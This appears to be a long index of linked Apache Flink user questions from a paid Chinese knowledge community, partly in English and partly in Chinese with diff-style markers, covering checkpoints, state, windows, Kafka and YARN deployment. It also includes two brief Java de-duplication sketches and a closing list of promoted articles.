274. [How can Flink treat streaming data batch-wise? The stream's data comes from a custom source reading several Redis hash tables, and a notion of batches must be controlled](https://t.zsxq.com/AIYnEQN)

275. [Some say it is not recommended to start multiple threads inside one task — what is your view on that?](https://t.zsxq.com/yJuFEYb)

276. [I want to build an SQL query solution running over an hbase+es architecture — can flink sql do it, or is there another solution or line of thought?](https://t.zsxq.com/3f6YBmu)

277. [Urgently working on the first project that uses Flink, so a question: for Flink 1.8.1 writing into ES7, is the bundled Sink used? Is there an example to share? Everything I find writes to ES6. I know this is not a great way to ask — mainly it is urgent, and a few attempts of my own did not succeed. T T](https://t.zsxq.com/jIAqVnm)

278. [After manually stopping a task, with the most recent savepoint already saved, how is the last checkpoint used when the task restarts?](https://t.zsxq.com/2fAiuzf)

279. [Batch processing using the stream environment (in order to use windows): how can it be determined that the batch has ended — that is, my task can know the batch file has been read completely, and close the task after processing the data? If that is not possible, how can batch processing implement window functionality?](https://t.zsxq.com/BIiImQN)

280. [If deduplication is restricted to inside a window and the data volume is fairly large, is there a good method?](https://t.zsxq.com/Mjyzj66)

281. [Has an article on end-to-end exactly once come out?](https://t.zsxq.com/yv7Ujme)

282. [How can streams be added dynamically? How can streams be removed dynamically? How can parameters be modified dynamically (broadcast)?](https://t.zsxq.com/IqNZFey)

283. [The custom source data source implements a notion of batches, and Flink then registers one batch of this stream as multiple tables for join operations — is there a way to know when the SQL over that batch has finished computing?](https://t.zsxq.com/r7AqvBq)

284. [Compiling Flink errors out — has the group owner hit this, and what is the cause?](https://t.zsxq.com/rvJiyf6)

285. [I currently run a flink cluster on yarn in standalone fashion with zookeeper for HA; now, looking at the checkpoint information in zk, why are the entries in it IPs rather than paths? How can I get that path? The rest api approach is ruled out, because once the task is closed the restapi is gone; the history server is ruled out as a bit clunky](https://t.zsxq.com/nufIaey)

286. [When using streamfilesink to consume Kafka and write into hdfs: if the Flink program is shut down directly, then on the next start of the program, consuming and writing to hdfs, the files again start from part-0-0, which conflicts with what was written before, and that file stays stuck in the in-progress state.](https://t.zsxq.com/Fy3RfE6)
 
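Questions 179 and 280 both come down to deduplicated counting inside a time window. Stripped of the Flink operators, the bookkeeping is just a per-window set keyed by the window start; a minimal plain-Java sketch, where the window assignment mirrors tumbling-window start alignment (class and method names are my own):

```java
import java.util.HashMap;
import java.util.HashSet;
import java.util.Map;
import java.util.Set;

public class WindowedDistinctSketch {
    // Per-window set of ids, keyed by window start; the set size is the
    // deduplicated count the window would emit on firing.
    static final Map<Long, Set<String>> windows = new HashMap<>();

    // Assign the event to its tumbling window and record the id once.
    static void add(long eventTimeMs, String id, long windowSizeMs) {
        long windowStart = eventTimeMs - (eventTimeMs % windowSizeMs);
        windows.computeIfAbsent(windowStart, k -> new HashSet<>()).add(id);
    }

    public static void main(String[] args) {
        long size = 60_000; // 1-minute tumbling windows
        add(5_000, "u1", size);
        add(10_000, "u1", size);  // duplicate id within the same window
        add(20_000, "u2", size);
        add(65_000, "u1", size);  // falls into the next window
        System.out.println(windows.get(0L).size());      // 2
        System.out.println(windows.get(60_000L).size()); // 1
    }
}
```

In a real job this set would live in keyed state (or, for large cardinalities, be replaced by an approximate structure such as HyperLogLog) so it is checkpointed and cleaned up when the window expires.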
287. [There is now a real-time data-analysis requirement — small data volume, but the sink must be MySQL with live updates. The handling I can think of: on each insert, first read MySQL; if the row exists, update, otherwise insert — but then every written record means two round trips. Is there a better way, or does Flink have a built-in API for this operation that may be either an update or an insert?](https://t.zsxq.com/myNF2zj)

288. [Flink has checkpointing configured; the job manager periodically deletes checkpoint data, but the task manager does not delete it — what is the reason?](https://t.zsxq.com/ZFiMzrF)

289. [A question about using rocksdb as the statebackend: where can rocksdb's I/O and memory metrics be monitored?](https://t.zsxq.com/z3RzJUV)

290. [Could you write an article on the use cases and usage of state? I do not understand this area well](https://t.zsxq.com/AUjE2ZR)

291. [May I ask how distinct count in the Flink 1.9 SQL API implements efficient streaming deduplication?](https://t.zsxq.com/aaynii6)

292. [Inside an operator, how can the current operator's parallelism and the index of the current task be obtained?](https://t.zsxq.com/mmEyVJA)

293. [Is there a demo of Flink 1.9 combined with Hive — Kafka to Hive?](https://t.zsxq.com/fIqNF6y)

294. [Could you talk about Apache Calcite?](https://t.zsxq.com/ne6UZrB)

295. [For a window operation like this, how is the data's state preserved after the program restarts abnormally?](https://t.zsxq.com/VbUVFMr)

296. [A question: using the kafkasource, I convert the received JSON string into a custom type using gson.fromJson(jsonstr, classOf[Entity]), and it reports the error in the image — I do not know how to solve it; printing directly without converting works fine](https://t.zsxq.com/EMZFyZz)

297. [A DataStream reads database tables and does a multi-table join; can a time window be set, refreshing once a day? The stream program keeps pulling data and the database cannot take it](https://t.zsxq.com/IEieI6a)

298. [A question: does Flink support wildcard reads over multiple paths? For example the path s3n://pekdc2-deeplink-01/Kinesis/firehose/2019/07/03/*/* — the wildcard read cannot find the path. Is special configuration needed?](https://t.zsxq.com/IemmiY7)

299. [Flink deployed in a yarn environment — but if the container's URL path is removed, it redirects to the Hadoop home page. How can Hadoop's yarn home-page address be hidden? If that address is exposed, users can see all the tasks, which is very dangerous](https://t.zsxq.com/QvZFUNN)

300. [How can a flink sql stream be written that outputs the current time every second?](https://t.zsxq.com/2JiubeM)

301. [(Because I want to make a data stream via sql, haha.) Another question: say I set the whole job to time windows based on processing time — inside the processAllWindowFunction, how do I know what each incoming element's processing time is, and on what basis does an element enter this time window?](https://t.zsxq.com/bQ33BmM)

302. [How can the data reported by one device be stored into the same hdfs file?](https://t.zsxq.com/rB6ybYF)

303. [I wrote my own Kafka producer test; the data format is very simple, (key,i), where key is a fixed unchanging string and i auto-increments. On the flink consumer side I enabled checkpointing, 
and it is exactly once; the program is simple — flink reads the Kafka data and prints it directly. Say I see key,10 printed and kill the program directly, then restart it; in principle it should continue from the last offset, i.e. key,11, but what I actually see may start from key,9 and then increment. Does this indicate duplicate consumption, and how is exactly once then to be guaranteed?](https://t.zsxq.com/MVfeeiu)

304. [Suppose a data source keeps producing data, and when Flink's backpressure reaches the source, Flink's processing speed cannot keep up with the source's production speed. Question 1: at that point, what does the Flink source do — discard the data it cannot finish processing, or buffer it? Question 2: if it buffers, how is the buffering done?](https://t.zsxq.com/meqzJme)

305. [When one stream sinks to multiple places, are those sinks serial or parallel?](https://t.zsxq.com/2fEeMny)

306. [I want a window on the stream whose trigger condition is a fixed time interval or the data count reaching a preset threshold — triggered as soon as either of the two is satisfied. Besides overriding the trigger, is there another way?](https://t.zsxq.com/NJY76uf)

307. [Using rocksdb as the state backend, and SQL group by on the time field to achieve de-windowing, there is no way to clean the earlier data, so disk usage grows very large. For this non-coding approach, is there a way to set a ttl and clean the old data?](https://t.zsxq.com/A6UN7eE)

308. [Why are there time windows of the two forms TimeWindow{start=362160000, end=362220000} and TimeWindow{start=1568025300000, end=1568025360000}? I use one-minute TumblingEventTimeWindows in both cases — why do the different forms appear?](https://t.zsxq.com/a2fUnEM)

309. [Say I count one day's order volume, but some data arrives a day late. For example, 2019.08.01's order volume should be 1000, but an order record of 100 was late and arrived only on 2019.08.02, so 2019.08.01's count is 900 — how is that wrong result corrected afterwards?](https://t.zsxq.com/Y3jqjuj)

310. [In flink streaming mode, is only on-heap memory used?](https://t.zsxq.com/zJaMNne)

311. [If cluster migration is considered, can state be migrated?](https://t.zsxq.com/EmMrvVb)

312. [We now have a business scenario where the reported data has the format (time, cumulative value), and we need the format (time, current value), where current value = cumulative value minus the previous record's cumulative value. How is this done in flink? We considered the state mechanism, but when the service goes down, the state is cleared](https://t.zsxq.com/6EUFeqr)

313. [What are the pros and cons of Flink On k8s compared with Flink on Yarn? Which is more suitable for use in production?](https://t.zsxq.com/y7U7Mzf)

314. [Is there a connector linking datahub to flink?](https://t.zsxq.com/zVNbaYn)

315. [If the single-point resourcemanager dies, what effect does that have on tasks?](https://t.zsxq.com/FQRNJ2j)

316. [flink watches binlog, joins with another dimension table, and sinks to the final MySQL table. For the insert, delete, and update operations on the final table, do different sinks need to be defined?](https://t.zsxq.com/rnemUN3)

317. [When exactly are windows merged? For example: when data enters windowoperator's processElement, if it is not a sessionwindow, is window merging performed?](https://t.zsxq.com/JaaQFqB)

318. [Can one stream in Flink take part in multiple computations and be output in multiple places? Would those paths affect each other?](https://t.zsxq.com/AqNFM33)

319. [The keyBy operator is defined as splitting a stream into disjoint partitions, each containing elements with the same key. What I do not understand: how is keyBy's partition count set — is it by setting this operator's parallelism? 
What is the relationship between the partition count and the slot count?](https://t.zsxq.com/nUzbiYj)

320. [Dynamic cep-patterns — could you explain in detail? Didi's solution is unpublished, and the images you posted are based on 1.7. Any thoughts of your own would also be welcome — thanks](https://t.zsxq.com/66URfQb)

321. [Question 1: using a long-running session started with ./bin/yarn-session.sh -n 10 -s 3 -d, the resources allocated at that point belong to the yarn queue; when flink submits a task with flink run xx.jar, how do the remaining machines obtain the runtime environment flink needs, given that only one machine in the cluster has the flink distribution?](https://t.zsxq.com/maEQ3NR)

322. [How are the memory isolation and cpu isolation between slots in a flink task manager implemented? What is the significance of flink's slot concept — why not do it like a spark executor, with no internal isolation?](https://t.zsxq.com/YjEYjQz)

323. [When spark integrates with kafka in direct mode, one spark partition corresponds to one partition of a kafka topic. When flink integrates with kafka, how is the kafka data consumed — suppose a kafka topic has 5 partitions?](https://t.zsxq.com/nuzvVzZ)

324. [For a flink job executed with ./bin/flink run -m yarn-cluster, the logs the job itself prints cannot be viewed via the yarn application logs — only the cluster's own logs are there. Where are the logs printed by logger.info stored, or is it a problem with how I package? I log with slf4j.](https://t.zsxq.com/27u3ZZf)

325. [In an IoT platform, threshold-violation checks must be done on each key's data; since each key's threshold differs, the thresholds are configured in a real-time database. If the thresholds are loaded into state, the key volume is very large (about 300 million), the state becomes too big, and memory may overflow. If the threshold is read from the real-time database while processing each record, the network I/O overhead may degrade real-time performance. How should this be handled? Thanks](https://t.zsxq.com/miuzFY3)

326. [If my flink program has multiple window operations, must the timestamp and watermark be assigned for every window? Also, must the event time exist as some field in the source data?](https://t.zsxq.com/amURvZR)

327. [Is there material on Flink 1.9's newly supported DDL connecting Kafka and writing into hbase? Our company wants to gradually turn the offline warehouse into a real-time one; writing SQL is quicker for us to pick up, so I want to find some materials in this area to learn from.](https://t.zsxq.com/eqFuBYz)

328. [Doing type conversion in flink 1.9, a mismatch occurred: the previously used Type is now deprecated, with the datatypes types recommended instead, but the schema typeinformation of the previously used Type-based methods does not correspond to DataTypes' return values — how should this be adjusted and adapted?](https://t.zsxq.com/yVvR3V3)

329. [In flink, does an exception on any single record bring the whole job down? Is there a way (other than exception catching) to just log that record's error and continue processing the data that follows? 
I have skimmed some of the fault-tolerance handling, which is about the program dying and, after restart, pulling data from a checkpoint; but if that record is itself the problem (especially in production, where this takes the job straight down, with considerable impact), how should that problem record be filtered out (exception catching being the last resort)?](https://t.zsxq.com/6AIQnEi)

330. [In a daily-report computation I use rabbitmq as the data source; why does the data in rabbitmq stay in unacked state? A window computation is triggered every minute and the computed elements are evicted. In the test environment all the data acks, but once in production it does not, and no error is reported either — where could the problem be?](https://t.zsxq.com/RBmi2vB)

331. [Our current data flow is kafka source, etl, redis sink. Can chk guarantee end-to-end semantics this way?](https://t.zsxq.com/fuNfuBi)

332. [1. When submitting a flink job via yarn-session: of flink-core, flink-clients, flink-scala, flink-streaming-scala, scala-library, flink-connector-kafka-0.10, which should be written with provided scope and which with compile scope, for the correct, conflict-avoiding setup? 2. What dependencies does flink-dist_2.11-1.8.0.jar actually contain? (This file's packaging differs from springboot's, so the jar dependencies cannot be seen clearly.)](https://t.zsxq.com/mIeMzvf)

333. [Using a count window in Flink has the problem that, in the end, some data never reaches the count value and the window then never fires; an idea seen here is to combine a time window with the count window](https://t.zsxq.com/AQzj6Qv)

334. [In flink stream processing, after a stream of data is registered as a Table, does that stream's historical data also stay in the Table? Why, whenever new data arrives, is the historically processed data re-executed?](https://t.zsxq.com/VvR3Bai)

335. [available is changing data; apart from the newest data being inserted into the database, the previously processed data was executed again several times](https://t.zsxq.com/jMfyNZv)

336. [These two days I have been studying flink's broadcast variables and found a problem: fetching the broadcast variable in a DataSet data set, the memory address fetched is the same (one machine maintains one broadcast data set), whereas in a DataStream the broadcast variable becomes one data set maintained per task (my usage may be at fault). So I would like to ask: can a broadcast variable fetched in a DataStream be maintained as one data set per machine, as in DataSet?](https://t.zsxq.com/m6Yrv7Q)

337. [After a Flink program enables the checkpoint mechanism and is killed multiple times with the yarn command, there are multiple job ids under the checkpoint directory. When resources are allocated again and the program restarts, how does the program find the previous jobid's directory rather than some other jobid's directory? Is the default the last one, or must a specific jobid be designated?](https://t.zsxq.com/nqzZrbq)

338. [Developing yesterday's duplicate-data-insertion problem further: when the data stream coming in from kafka is registered with registerDataStream as a Table for joins, printing the table's length shows that data keeps being appended to the table — how can it process one record as it comes, without appending?](https://t.zsxq.com/RNzfQ7e)

339. [Does flink 1.9 sql have a handling approach similar to partitioned tables? We now have a business with 1 source, but the data must be computed separately over 5 minutes, 10 minutes, and 15 minutes.](https://t.zsxq.com/AqRvNNj)

340. [I just set up a server, and when running the basic startup commands I find the task does not come up, so the web page shows three 0s; I looked at the log and there is no error message either — do you know what the problem might be?](https://t.zsxq.com/q3feIuv)

341. [I defined a custom Sink extends RichSinkFunction, with the field private transient Object lock;. If I initialize this lock directly as private transient Object lock = new Object();, it does not work — using lock inside invoke gives a null pointer; initializing lock in the custom Sink's constructor does not work either. But initializing it in the open 
method works — why? Can you explain the execution principle? And if one slot runs five sink instances, will five sink objects be newed, or one?](https://t.zsxq.com/EIiyjeU)

342. [How should the number of Kafka brokers be estimated?](https://t.zsxq.com/aMNnIy3)

343. [How can flink on yarn be debugged remotely?](https://t.zsxq.com/BU7iqbi)

344. [A current requirement: the source data dataA, dataB, DataC is obtained from three kafka topics and must then be merged. But there are several problems I currently do not know how to solve: dataA="id:10001,info:***,date:2019-08-01 12:23:33,entry1:1,entryInfo1:***", dataB="id:10001,org:***,entry:1", dataC="id:10001,location:***". (1) How are the three streams merged? (2) dataA in the data has a time, but dataB and dataC both have no timestamp — how, then, are eventTime and late out-of-order data handled? Please help take a look, thanks](https://t.zsxq.com/F6U7YbY)

345. [I read JSON data from kafka with flink, and after deserialization the Chinese parts become a string of question marks — what must be done so the Chinese comes through normally?](https://t.zsxq.com/JmIqfaE)

346. [I have several Flink programs (independent jars) that, for online business-data analysis, all use the same batch of configuration data from MySQL (5000-odd rows). The current implementation is that every program independently loads this configuration data into memory for quick use, but it now feels somewhat wasteful of resources and structurally inelegant. Is there another solution for this kind of situation? Thanks](https://t.zsxq.com/3BMZfAM)

347. [For Flink checkpoints, choose RocksDBStateBackend or FsStateBackend? Currently our tasks run for a while and then get stuck dead.](https://t.zsxq.com/RFMjYZn)

348. [What problems currently remain for flink on k8s in the areas of high availability and scaling in and out?](https://t.zsxq.com/uVv7uJU)

349. [A question, which is this: Kafka now has 4 partitions producing 4000-5000 log records per second, but on the consumer FLINK side I opened only 4 slots for intake, which just split and store after receiving. Lag has now appeared, and I cannot tell whether my splitting here is slow or Flink's intake of the kafka data is slow. The Flink UI shows high backpressure on these two](https://t.zsxq.com/zFq3fqb)

350. [I would like to ask: in flink cluster mode, can a certain node be designated to execute a task?](https://t.zsxq.com/NbaMjem)

+ [A question: when is the merge method of an aggrefunction used? There are answers on Google saying it merges identical keys, but identical keys should have been hashed to the same task — I do not quite understand this part](https://t.zsxq.com/VnEim6m)

+ [How does flink solve this kind of problem? 1. eventA initiates an event and eventB responds to it; compute the event-response success rate per minute. Explanation: eventA and eventB are linked by the same commitId; eventA's time reaching flink is earlier than eventB's, though eventB may also arrive earlier than eventA. The requirement: if eventA has five records A,B,C,D,E and eventB has five records A',B',C',X',Y', the success rate is 3/5. 2. 
Compute eventC's success rate (status 0 or 1) once per minute; but that event's logs are reported repeatedly, and only the one with the earliest eventTime is counted — whatever was counted in the previous minute is not counted again in the next](https://t.zsxq.com/eMnMrRJ)

+ [Could you systematically explain the HA design schemes and source code for Yarn, k8s, and standalone in the current Flink version?](https://t.zsxq.com/EamqrFQ)

+ [How can a job be submitted via the Java API to run in yarn-cluster mode?](https://t.zsxq.com/vR76amq)

+ [Has anyone hit the stream-corruption problem? I do not know where to start solving it](https://t.zsxq.com/6iMvjmq)

+ [Can the cause of the anomaly be seen from this log? I checked kafka, yarn, and zookeeper — none of the three components shows any anomaly](https://t.zsxq.com/uByFUrb)

+ [Why does flink internally maintain two communication frameworks — client to jobmanager and jobmanager to taskmanager communicate via akka, yet taskmanagers communicate among themselves via netty?](https://t.zsxq.com/yvBiImq)

+ [A small question for the group: in flink's wordcount, when output goes to the console, what does the number followed by > in front mean?](https://t.zsxq.com/yzzBMji)

+ [Reading data from kafka's topicA, transforming, and writing to topicB, with checkpointing enabled: after the task starts, it runs normally and the new topic also receives data, but I want to monitor whether consuming topicA lags; using the script the kafka client provides to view the groupid's information, it says that groupid does not exist](https://t.zsxq.com/MNFUVnE)

+ [After splitting a flink stream and then windowing each branch, how can the results of the multiple window computations be gathered together as one sink with scheduled output? I want the different real-time metrics computed from the multiple streams — for example, statistics over multiple metrics every 1 min (the metrics being distributed across different streams) — stored as one tuple into mysql](https://t.zsxq.com/mUfm2zF)

+ [How does Flink ultimately output to a data dashboard?](https://t.zsxq.com/nimeA66)

+ [Why, after my keyBy, does data of different keys enter the same AggregateFunction? Or is the AggregateFunction instance used by different keys the same one? After I assign a value to an object inside the AggregateFunction, I find that other keys' data overwrites the earlier data — what is going on?](https://t.zsxq.com/IMzBUFA)

+ [How can a flink window computation's result be aggregated together with earlier results?](https://t.zsxq.com/yFI2FYv)

+ [How should flink on yarn tasks be monitored? The previously bundled influxdb metrics seemingly cannot collect metrics from flink on yarn](https://t.zsxq.com/ZZ3FmqF)

+ [When flink 1.9.0 consumes kafka 0.10.1.1 data, the UI monitoring shows that some partitions' current offset and commit offset keep displaying as negative numbers and never change as the program runs — may I ask what is going on?](https://t.zsxq.com/QvRNjiU)

+ [Using rank with flink 1.9 reports org.apache.flink.table.api.TableException: RANK() on streaming table is not supported currently](https://t.zsxq.com/Y7MBaQb)

+ [Can a Flink task dynamically change its source's kafka topic, without restarting the task?](https://t.zsxq.com/rzVjMjM)

+ [1. What is the distinguishing point between keyed state and operator state (whether a shuffle step happened?) 2. What is the CheckpointedFunction interface for? 
3. When is the snapshotState method called?](https://t.zsxq.com/ZVnEyne)

+ [A question for everyone: how do you generally collect logs? The task manager seems to print different jobs' logs mixed together — is there a way to print them separately?](https://t.zsxq.com/AayjeiM)

+ [I recently received a requirement: count today's cumulative online users, deduplicated, displaying a result every 5 seconds — how should this requirement be done?](https://t.zsxq.com/IuJ2FYR)

+ [Currently a problem with flink consuming kafka. The kafka used is Aliyun's kafka, where consumers can be provisioned. Currently, under the same topic A-test, consuming with the A1 consumer group, the data volume obtained at the source end differs greatly between two programs: figure one is the current consumption of kafka written into another kafka topic, currently known to have only 100 records; figure two consumes kafka and writes into hdfs. The two consumptions start from the same offset (after consuming, the offset is restored to the beginning and consumed again); by time, and with the consume-from-the-beginning strategy, it is still only 100 records; afterwards I turned off the option of committing kafka's offset to the checkpoint, and it is still only 100 records. Very strange — so I want to ask whether this problem should be approached and solved from state](https://t.zsxq.com/eqBUZFm)

+ [A question: are there recommended grafana dashboards? We currently use the prometheus pushgateway reporter to collect metrics, but at present it is still not quite clear which metrics should be the key focus](https://t.zsxq.com/EYz7iMV)

+ [On yarn: 1. does session-mode submission mean multiple flink tasks are managed by the same jobManager? 2. does per-job mode start a separate jobManager for each?](https://t.zsxq.com/u3vVV3b)

+ [Have you used lettuce to connect to a redis cluster in flink? I get an error when using it here: Cannot retrieve initial cluster partitions from initial URIs](https://t.zsxq.com/VNnEQJ6)

+ [Hello zhisheng — when I use flink sliding windows, a large amount of content is written into redis every 10 minutes, which has affected online performance. Is there a way to control the speed of writing to redis?](https://t.zsxq.com/62ZZJmi)

+ [flink standalone mode; the service-start command is flink run -c ClassName jar. How can the corresponding Slots be distributed evenly? The problem currently encountered: one machine's Slots keep being used, and once there are more tasks the taskjob simply gets killed. The error message is in figure two](https://t.zsxq.com/2zjqVnE)

+ [Hello zhisheng — clusters like standalone and yarn both depend on the ssh protocol for the mutual communication of master and workers; may I ask whether there is a setup approach that does not depend on the ssh protocol?](https://t.zsxq.com/qzrvbaQ)

+ [In the official docs, which scenarios do these two kinds of periodic watermark generation each suit?](https://t.zsxq.com/2fUjAQz)

+ [Periodic watermarks are set to be generated on a timer, ExecutionConfig.setAutoWatermarkInterval(…) — how is this timer interval generally estimated?](https://t.zsxq.com/7IEAyV3)

+ [I would like to ask whether the time flink takes to allocate resources can be obtained?](https://t.zsxq.com/YjqRBq3)

+ [A question: flink producing data to kafka sometimes errors: This server does not host this topic-partition](https://t.zsxq.com/vJyJiMJ)

+ [flink started in yarn mode, with the log4j.properties configuration information in the image; on the yarn startup page, the taskmanager shows logs output to stdout, but in the designated log folder no log file at all is generated — running locally, there is a log file](https://t.zsxq.com/N3ZrZbQ)

+ [A question about flink2hbase: how can tables be created dynamically per day according to the date field in hbase? I defined a custom hbase sink and create the table in the invoke method according to the data's time, but this brought a problem: every record has to check whether the table exists, which generates a large number of rpc requests. Dear group owner, for the situation described above, is there a good solution?](https://t.zsxq.com/3rNBubU)

+ [Hello — is there material related to TMs, slots, memory, thread counts, process counts, cpu, and scheduling? For example, how many threads a slot starts, why, how they are started, how tasks are scheduled, and so on. I did not find what I wanted online, and the books are not detailed enough. As for the source, I cannot quite understand it yet at the start, so I want to find materials to look at first](https://t.zsxq.com/buBIAMf)

+ [Is it possible, in flink, to create just one FlinkKafkaConsumer that reads multiple kafka topics whose processing logic is all the same, finally writing the data into the es table corresponding to each topic? What would the implementation logic of this be?](https://t.zsxq.com/EY37aEm)

+ [Could you describe how, in a window — for example a tumbling window — multiple events, once they enter the window, are kept in memory? Do they become one state? Or do multiple events become one state? What is the relation between events and state? Once the event time has passed, how does the window clean up events? And if the state backend is RocksDBStateBackend with incremental checkpoints, how are the saved, expired events cleaned up?](https://t.zsxq.com/3vzzj62)

+ [A question: how is Flink's monitoring done — for example, alerting and notification when a job dies? Currently I want to do the monitoring with Prometheus, but I find the reported metrics do not match my needs very well. My jobs here are started with yarn-session, so one jobManger manages multiple jobs. I am still at the just-getting-to-know stage with Prometheus and may have overlooked some reported metrics — does the group owner have good advice?](https://t.zsxq.com/vJyRnY7)

+ [Can ProcessTime and EventTime be used together? When a task throws an exception and fails, with a restart strategy configured, does the restart continue from the most recent checkpoint? I hit a database primary-key-conflict problem; checking the kafka source showed only one message for that primary key, and the logs showed the Redis connection pool threw an exception (Redis was restarting at the time), causing the task to fail and retry — ProcessTime was in use at the time](https://t.zsxq.com/BuZJaUb)

+ [In flink-kafka custom deserialization, how is abnormal data best handled? I flipped back to an earlier question: if a try-catch catches the exception, is throwing the exception better, or is returning null better?](https://t.zsxq.com/u3niYni)

+ [We are currently using flink to compare upstream and downstream data, and have hit a performance bottleneck: one node can currently consume at most 50 records. Observing the gc logs in the taskmanager log shows a max heap of 2.7g, but a young generation of at most only 300m. Can flink's jvm parameters be set, in flink on yarn startup mode?](https://t.zsxq.com/rvJYBuB)

+ [A question of principle: what is the essential difference between side output and directly processing one stream in two ways? I tried it — writing one stream to a cache on one side and into a database on the other — and both sides got the full data](https://t.zsxq.com/Ee27i6a)

+ [How can a flink window processing mode be defined that handles 500 records per second: 1. when kafka has 10000 records, still process 500 per second; 2. when kafka has 20 records, process once every 1 second.](https://t.zsxq.com/u7YbyFe)

+ [A question: can the web UI save savepoints, or can it only start from a savepoint?](https://t.zsxq.com/YfAqFUj)

+ [Can certain Kafka partitions be designated for consumption-pulling while the other partitions are not pulled? There are now many scenarios where a topic has a hundred-plus partitions but I only need the data of a few of them](https://t.zsxq.com/AUfEAQB)

+ [I want to filter certain data that kafka 
读到的某些数据,过滤条件从redis中拿到(与用户的配置相关,所以需要定时更新),总觉得怪怪的,请问有更好的方案吗?因为不提供redis的source,因此我是用jedis客户端来读取redis数据的,数据也获取不到,请问星主,flink代码在编写的时候,一般是如何调试的呢](https://t.zsxq.com/qr7UzjM)
-
-+ [flink使用rocksdb状态检查点存在HDFS上,有的任务状态很小但是HDFS一个文件最小128M所以磁盘空间很快就满了,有没有啥配置可以自动清理检查点呢](https://t.zsxq.com/Ufqj2ZR)
-
-+ [这是实时去重的问题。
- 举个例子,当发生订单交易的时候,业务中台会把该笔订单消息发送到kafka,然后flink消费,统计总金额。如果因为业务中台误操作,发送了多次相同的订单过来(订单id相同),那么统计结果就会多次累加,造成统计的总金额比实际交易金额更多。我需要自定义在source里通过operator state去重,但是operator state是和每个source实例绑定,会造成重复的订单可能发送到不同的source实例,这样取出来的state里面就可能没有上一次已经记录的订单id,那么就会将这条重复的订单金额统计到最后结果中,](https://t.zsxq.com/RzB6E6A)
-
-+ [双流join的时候,怎么能保证两边来的数据是对应的?举个例子,订单消息和库存消息,按逻辑来说,发生订单的时候,库存也会变,这两个topic都会同时各自发一条消息给我,我拿到这两条消息会根据订单id做join操作。问题是那如果库存消息延迟了5秒或者10秒,订单消息来的时候就join不到库存消息,这时候该怎么办?](https://t.zsxq.com/nunynmI)
-
-+ [我这有一个比对程序用的是flink,数据源用的是flink-kafka,业务数据分为上下游,需要根据某个字段分组,相同的key上下游数据放一起比对。上下游数据进来的时间不一样,因此我用了一个可以迭代的窗口大小为5分钟window进行比对处理,最大迭代次数为3次。statebackend用的是fsstatebackend。通过监控发现当程序每分钟数据量超过2万条的时候,程序就不消费数据了,虽然webui上显示正常,而且jobmanager和taskmanager的stdout没有异常日志,但是程序就是不消费数据了。](https://t.zsxq.com/nmeE2Fm)
-
-+ [异步io里面有个容量,是指同时多少个并发还是,假如我每个taskmanager核数设置10个,共10个taskmanager,那我这个数量只能设置100呢](https://t.zsxq.com/vjimeiI)
-
-+ [有个性能问题想问下有没有相关的经验?一个job从kafka里读一个topic数据,然后进行分流,使用sideout分开之后直接处理,性能影响大吗?比如分开以后有一百多子任务。还有其他什么好的方案进行分流吗?](https://t.zsxq.com/mEeUrZB)
-
-+ [线上有个作业抛出了一下异常,但是还能正常运行,这个怎么排查,能否提供一下思路](https://t.zsxq.com/Eayzr3R)
-
-等等等,还有很多,复制粘贴得我手累啊 😂
-
-另外里面还会及时分享 Flink 的一些最新的资料(包括数据、视频、PPT、优秀博客,持续更新,保证全网最全,因为我知道 Flink 目前的资料还不多)
-
-[关于自己对 Flink 学习的一些想法和建议](https://t.zsxq.com/AybAimM)
-
-[Flink 全网最全资料获取,持续更新,点击可以获取](https://t.zsxq.com/iaEiyB2)
-
-再就是星球用户给我提的一点要求:不定期分享一些自己遇到的 Flink 项目的实战,生产项目遇到的问题,是如何解决的等经验之谈!
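A recurring theme in the questions above is de-duplication, starting with the very first one: count, per minute, only the record with the earliest eventTime, and never re-count an id that a previous minute already counted. Framework aside, the bookkeeping can be sketched in plain JDK (a sketch only; in a real Flink job this would live in keyed state, ideally with TTL, rather than an unbounded in-memory set, and the class and method names here are made up for illustration):

```java
import java.util.HashMap;
import java.util.HashSet;
import java.util.Map;
import java.util.Set;

// Sketch (plain JDK, no Flink): per event id keep only the earliest eventTime,
// and never count an id that an earlier minute already counted.
class EarliestEventDedup {
    private final Set<String> alreadyCounted = new HashSet<>();      // ids counted in past minutes
    private final Map<String, Long> earliestThisMinute = new HashMap<>();

    /** Offer one (possibly duplicated) event for the current minute. */
    void offer(String id, long eventTime) {
        if (alreadyCounted.contains(id)) {
            return; // already counted in a previous minute: ignore the repeat
        }
        // keep only the earliest eventTime seen for this id in this minute
        earliestThisMinute.merge(id, eventTime, Math::min);
    }

    /** Close the minute: return how many distinct new ids were counted. */
    int closeMinute() {
        alreadyCounted.addAll(earliestThisMinute.keySet());
        int counted = earliestThisMinute.size();
        earliestThisMinute.clear();
        return counted;
    }
}
```

The same shape maps onto Flink as a `keyBy(id)` plus a `ValueState`/`MapState` check, with state TTL playing the role of the ever-growing `alreadyCounted` set.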
- -1、[如何查看自己的 Job 执行计划并获取执行计划图](https://t.zsxq.com/Zz3ny3V) - -2、[当实时告警遇到 Kafka 千万数据量堆积该咋办?](https://t.zsxq.com/AIAQrnq) - -3、[如何在流数据中比两个数据的大小?多种解决方法](https://t.zsxq.com/QnYjy7M) - -4、[kafka 系列文章](https://t.zsxq.com/6Q3vN3b) - -5、[Flink环境部署、应用配置及运行应用程序](https://t.zsxq.com/iiYfMBe) - -6、[监控平台该有架构是长这样子的](https://t.zsxq.com/yfYrvFA) - -7、[《大数据“重磅炸弹”——实时计算框架 Flink》专栏系列文章目录大纲](https://t.zsxq.com/beu7Mvj) - -8、[《大数据“重磅炸弹”——实时计算框架 Flink》Chat 付费文章](https://t.zsxq.com/UvrRNJM) - -9、[Apache Flink 是如何管理好内存的?](https://t.zsxq.com/zjQvjeM) - -10、[Flink On K8s](https://t.zsxq.com/eYNBaAa) - -11、[Flink-metrics-core](https://t.zsxq.com/Mnm2nI6) - -12、[Flink-metrics-datadog](https://t.zsxq.com/Mnm2nI6) - -13、[Flink-metrics-dropwizard](https://t.zsxq.com/Mnm2nI6) - -14、[Flink-metrics-graphite](https://t.zsxq.com/Mnm2nI6) - -15、[Flink-metrics-influxdb](https://t.zsxq.com/Mnm2nI6) - -16、[Flink-metrics-jmx](https://t.zsxq.com/Mnm2nI6) - -17、[Flink-metrics-slf4j](https://t.zsxq.com/Mnm2nI6) - -18、[Flink-metrics-statsd](https://t.zsxq.com/Mnm2nI6) - -19、[Flink-metrics-prometheus](https://t.zsxq.com/Mnm2nI6) - -20、[Flink 注解源码解析](https://t.zsxq.com/f6eAu3J) - -21、[使用 InfluxDB 和 Grafana 搭建监控 Flink 的平台](https://t.zsxq.com/yVnaYR7) - 